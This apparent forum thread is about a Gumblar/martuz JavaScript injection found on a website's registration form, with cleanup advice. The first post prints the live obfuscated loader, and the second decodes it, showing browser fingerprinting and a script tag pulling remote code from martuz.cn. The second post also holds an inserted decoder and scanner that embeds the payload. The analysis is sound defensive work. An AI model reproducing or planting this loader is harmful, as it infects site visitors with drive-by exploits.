#1
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
Strange JS Code!
Hi,
I have a website and it was working OK, but for the last month there have been issues and I can't access a particular form on my website. When I checked, I noticed that my firewall is blocking it as it has some strange JS code (I saw the strange code via View Source on another computer). I am placing the code here so that anyone can suggest what I should do. The following code occurs after the [/head] and before the [body] tags. Code:
<script language=javascript><!--
(function(){var bpAjN='%';var igdR='var-20a-3d-22ScriptE-6egine-22-2c-62-3d-22-56e-72si-6fn-28)+-22-2cj-3d-22-22-2cu-3d-6eavigator-2eu-73er-41gent-3bif(-28u-2ei-6edexOf(-22Chrome-22-29-3c0-29-26-26(u-2ein-64e-78Of(-22Win-22)-3e0-29-26-26(u-2ei-6edexOf-28-22NT-20-36-22)-3c0-29-26-26(-64ocum-65nt-2ec-6fokie-2e-69nd-65-78Of(-22miek-3d-31-22-29-3c0)-26-26(typ-65-6f-66(zrvzt-73)-21-3dtype-6ff(-22A-22)))-7bzrvz-74-73-3d-22A-22-3be-76-61l-28-22if(-77-69ndow-2e-22+-61+-22)j-3dj+-22+a-2b-22Maj-6f-72-22+b+-61+-22Min-6f-72-22+-62+-61+-22Bui-6cd-22+b+-22j-3b-22-29-3bdo-63-75m-65-6et-2ew-72ite(-22-3cscript-20s-72c-3d-2f-2fm-61rt-22+-22uz-2ec-6e-2fvi-64-2f-3fid-3d-22+j+-22-3e-3c-5c-2fscr-69p-74-3e-22)-3b-7d';var by61A=igdR.replace(/-/g,bpAjN);eval(unescape(by61A))})();
--></script>
Please tell me what this is and how I can remove it. Thanks, Zeeshan
#2
Google search user
Join Date: Jul 2005
Location: West Springfield, Massachusetts
Posts: 9,128
It's weakly obfuscated code that runs this
Code:
// decoded payload: the wrapper swaps "-" for "%", then unescape()s and eval()s the result
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
// only fires for non-Chrome browsers on Windows whose UA does not say "NT 6" (i.e. not Vista/7),
// skips visitors carrying a miek=1 cookie, and runs once per page via the zrvzts global
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
  zrvzts="A";
  // fingerprints the JScript engine: ScriptEngineMajorVersion() etc. only exist in IE
  eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
  // loads a remote script; the hostname is split across two literals to dodge simple greps
  document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");
}
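Added example (mine, not code from the thread): a static decoder that reverses the obfuscation in post #1 the same way Mittineague did, and a scan over page HTML for the same eval(unescape()) wrapper, which is the check the later advice to look through the server's files calls for. INJECTED is the igdR literal copied from post #1; SAMPLE_HTML is a constructed page carrying it; nothing is executed, the payload is only decoded and inspected.

```javascript
// INJECTED is the encoded literal from post #1; SAMPLE_HTML is a constructed page wrapping it
// exactly as the thread shows (replace "-" with "%", unescape, eval).
const INJECTED = "var-20a-3d-22ScriptE-6egine-22-2c-62-3d-22-56e-72si-6fn-28)+-22-2cj-3d-22-22-2cu-3d-6eavigator-2eu-73er-41gent-3bif(-28u-2ei-6edexOf(-22Chrome-22-29-3c0-29-26-26(u-2ein-64e-78Of(-22Win-22)-3e0-29-26-26(u-2ei-6edexOf-28-22NT-20-36-22)-3c0-29-26-26(-64ocum-65nt-2ec-6fokie-2e-69nd-65-78Of(-22miek-3d-31-22-29-3c0)-26-26(typ-65-6f-66(zrvzt-73)-21-3dtype-6ff(-22A-22)))-7bzrvz-74-73-3d-22A-22-3be-76-61l-28-22if(-77-69ndow-2e-22+-61+-22)j-3dj+-22+a-2b-22Maj-6f-72-22+b+-61+-22Min-6f-72-22+-62+-61+-22Bui-6cd-22+b+-22j-3b-22-29-3bdo-63-75m-65-6et-2ew-72ite(-22-3cscript-20s-72c-3d-2f-2fm-61rt-22+-22uz-2ec-6e-2fvi-64-2f-3fid-3d-22+j+-22-3e-3c-5c-2fscr-69p-74-3e-22)-3b-7d";
const SAMPLE_HTML = `</head>\n<script language=javascript><!--\n(function(){var bpAjN='%';var igdR='${INJECTED}';var by61A=igdR.replace(/-/g,bpAjN);eval(unescape(by61A))})();\n--></script>\n<body>`;

// Mirror unescape() for the %XX form only: the separator followed by two hex digits.
function dashUnescape(encoded, sep = "-") {
  const safe = sep.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"); // escape regex metacharacters
  const re = new RegExp(safe + "([0-9A-Fa-f]{2})", "g");
  return encoded.replace(re, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Pull the indicators a defender wants out of the decoded payload.
function describe(decoded) {
  // the hostname is split across two literals ("//mart"+"uz.cn"); glue adjacent
  // literals back together before extracting the src URL
  const joined = decoded.replace(/"\s*\+\s*"/g, "");
  const pick = (s, re) => { const m = s.match(re); return m ? m[1] : null; };
  return {
    usesEval: /\beval\s*\(/.test(decoded),
    writesScript: /document\.write\s*\(\s*"<script/i.test(decoded),
    remoteSrc: pick(joined, /<script\s+src=([^"\s>]+)/i),
    cookieMarker: pick(decoded, /cookie\.indexOf\("([^"]+)"\)/),
    // "u" is the name this payload gives navigator.userAgent
    userAgentGates: [...decoded.matchAll(/\bu\.indexOf\("([^"]+)"\)/g)].map(m => m[1]),
  };
}

// Find inline scripts in a page that use the eval(unescape(...)) trick and return
// each one decoded and described; run this over the files pulled from the server.
function findInjectedScripts(html) {
  const hits = [];
  for (const m of html.matchAll(/<script[^>]*>([\s\S]*?)<\/script>/gi)) {
    const body = m[1];
    if (!/eval\s*\(\s*unescape\s*\(/.test(body)) continue;
    const lit = body.match(/'([^']{40,})'/);          // the long encoded literal
    const sepm = body.match(/\.replace\(\/(.)\/g/);   // the separator it swaps for "%"
    if (!lit) continue;
    hits.push(describe(dashUnescape(lit[1], sepm ? sepm[1] : "-")));
  }
  return hits;
}
```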
#3
SitePoint Guru
Join Date: Mar 2003
Location: In tha fruit cellar
Posts: 893
It's been a while since I saw this now, and it looks like it's been slightly modified.
It is a modified version of the infamous "Gumblar exploit" or "fake Yahoo counter", as it also appeared in some versions... This version however uses another domain, which is Martuz dot cn. There is also an added check to see if you use Google Chrome, and it does not load the external script if Chrome is used. The rest looks like the old Gumblar exploit to me.

It normally happens because your PC is infected with trojans and sniffers that scan your puter for usernames and passwords and send them to a server for further use. They then make use of this info to inject/place this iframe and code in your files. It infects php/html/js etc.; it also makes some new files and disguises some of them as pictures/jpg etc.

Fire up regedit and have a look for this reg value: "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux" (or aux2). If you find it, delete it. Clear all files on the server and make sure you replace them with FRESH new ones, and not new infected ones. Scan your server's folders and files for strange unknown files and pictures and delete them if you find any. Scan your PC and clear ALL your TEMP files. Change passwords when you have cleaned your puter and cleared its cache and Temp files, but first do a restart, then change passwords.

This can be nasty, and in many cases people almost gave up because it kept coming back no matter what they did. So it's important to make sure you've cleaned your local PC properly. You can find more information on this by doing a Google search for the "Gumblar exploit" and "fake yahoo counter", as this on your site is just a slightly modified version of it.
#4
SitePoint Guru
Join Date: Mar 2003
Location: In tha fruit cellar
Posts: 893
I had to make some food here... but here is some more info; you can also find more info as it has been discussed in some previous posts, back when it was pure Gumblar code...
The code triggers another address, as you can see from Mittineague's post of the de-obfuscated code... here two exploits are triggered and try to execute on the "victim's" computer. You can see from the code that it targets IE prior to NT6 (Vista), and it tries to exploit known vulnerabilities in Adobe PDF and Flash Player to execute its code and infect as many as possible. But as I said, it most likely has its roots in something installed on your local puter.
#5
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
Okay, but I have a few other websites as well, and I have uploaded some other files to each of those websites. And there are no such problems.
What do you think?
#6
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
Moreover, the strange code is appearing on only one page, which is a Registration Form, and at only one hosting server. When I tried it on a different server, it was OK.
@Crazybanana: The registry entry you mentioned is related to the SOUND CARD driver of the system. If I delete that, it will turn the sound off.
#7
Google search user
Join Date: Jul 2005
Location: West Springfield, Massachusetts
Posts: 9,128
Have you
1. Cleaned your computer?
2. Changed usernames/passwords, including FTP?
3. Re-uploaded the website files from a clean backup?
I realize it's a bit of work, but that's what needs to be done.
#8
SitePoint Guru
Join Date: Mar 2003
Location: In tha fruit cellar
Posts: 893
Scan your PC with the newest AVG, Avast, Malwarebytes, Norton etc. Make sure you clear all your TEMP files: this is the content of the folder "Temp" inside the hidden "Local Settings" folder and the hidden folder "Content.ie5" inside your hidden "Temporary Internet Files" folder. And clear all other cache and history. You have to boot into safe mode to delete some of it, and remember: just the contents of these folders, not the folders themselves. Scan for viruses both in safe mode and normal mode, as some files/viruses can only be dealt with in SAFE MODE! Empty Trash and reboot, scan again, and do a netstat from the command line to look for suspicious connections.

Maybe your code/script/app has a weakness that allowed it to be exploited to inject the code, but I doubt it from what you've told us above. It looks like there is something stored on that server that injects this code as soon as you upload it.

So have a second look at it to see if something has been added, or if it looks suspicious. If you're unsure, post the regkey for others to have a look, or copy and paste this into Notepad and save it as regfix.reg (choose to save as all files to get the .reg), but back up the registry/registry key first: Code:
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"aux"="wdmaud.drv"

Check error logs (if any) and clean the server. Then upload a clean copy (after you've cleaned your puter). Make sure that what you upload is clean, as this "virus" creates fake files and embeds itself in almost all kinds of files; it also disguises itself as images and scripts etc., so double check everything to be sure. It is very important to clear cache as some files run from, yeah that's right, from Cache. After doing all this, change your usernames/passwords including those for FTP, and do a netstat as I said to double check... then upload new clean content and let us know what's happening...
#9
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
Woooof!
Thanks a lot for sharing all this, I will definitely look into all these things you have suggested. But here is something: as you said that my local computer might have something, IF yes, then why does it only inject the JS code and show that on one hosting? Why not on the other sites I have been working on?
#10
Google search user
Join Date: Jul 2005
Location: West Springfield, Massachusetts
Posts: 9,128
Do all your sites have the same username, password and files?
#11
SitePoint Guru
Join Date: Mar 2003
Location: In tha fruit cellar
Posts: 893
But there are several things I could speculate about... like some passwords are stored and some need to be written each time of use; or contact was lost between your PC and the server/hosting of the malicious gathering script; the hosting server was shut down or the sw removed; your virus/malware app found it and deleted it; your other info has not yet been used by the attackers; sw/scripts on your server have been patched; or you've just been lucky.
Anyway, there has been a hack, and if you ignore it without further investigation it will most likely happen again.
#12
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
No, the other sites' FTP login details are different, and the files are different too.
But when I uploaded the thing to another hosting for testing, it was OK there and there was no such code. But when I moved the files to the actual server, it shows the code.
#13
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
Is it possible that the HOSTING SERVER is infected?
#14
SitePoint Guru
Join Date: Mar 2003
Location: In tha fruit cellar
Posts: 893
This is how this martuz/Gumblar exploit/virus works (at least this is how it used to work, but I guess it's working the same way now, even if some of the scripts have been rewritten a bit). This virus/exploit doesn't spread outside of the user account that is infected. So search the server you are using for any suspicious files and scripts. Also remember that it embeds itself in other files, so even if you don't see any unknown or suspicious files or folders, it can still be there, embedded in other legal files. But also remember to double check the computers which have had access to the server that has this problem.
#15
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
Yes, that is what I thought earlier, as my client also has access to that server. Well, I have access to 100s of different servers, but none of them is infected. That means my computer is not infected, and it's the particular client's PC that has the virus and thus infected his server.
Thanks a lot CrazyBanana, and all others.
#16
Google search user
Join Date: Jul 2005
Location: West Springfield, Massachusetts
Posts: 9,128
You ran some thorough scans of your computer and they all came up clean?
If they did then your assumption based on the diagnosis of the symptoms is most likely correct.
#17
SitePoint Guru
Join Date: Mar 2003
Location: In tha fruit cellar
Posts: 893
Quote:
#18
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
For scanning and cleaning the following:
1) Trojan
2) Worm
3) Spam Software / Spyware
4) PUP (Potentially Unwanted Programs)
5) anything else
what is the best FREE software available?